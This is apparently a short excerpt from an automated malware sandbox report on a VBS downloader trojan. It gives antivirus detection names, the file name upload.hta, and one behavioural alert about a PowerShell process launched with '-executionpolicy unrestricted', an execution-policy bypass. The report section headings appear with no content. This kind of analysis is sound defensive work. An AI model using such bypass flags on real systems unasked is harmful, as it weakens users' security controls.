FireEye	VBS.Heur.ObfDldr.26.0F6D7C56.Gen
ESET-NOD32	VBS/TrojanDownloader.Agent.XAO
BitDefender	VBS.Heur.ObfDldr.26.0F6D7C56.Gen
Ad-Aware	VBS.Heur.ObfDldr.26.0F6D7C56.Gen
Emsisoft	VBS.Heur.ObfDldr.26.0F6D7C56.Gen (B)
Jiangmin	Trojan.Script.amhb
GData	VBS.Heur.ObfDldr.26.0F6D7C56.Gen
ALYac	VBS.Heur.ObfDldr.26.0F6D7C56.Gen
MAX	malware (ai score=81)

Creates a suspicious Powershell process (2 events)

option	-executionpolicy unrestricted				value	Attempts to bypass execution policy
option	-executionpolicy unrestricted				value	Attempts to bypass execution policy

upload.hta

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All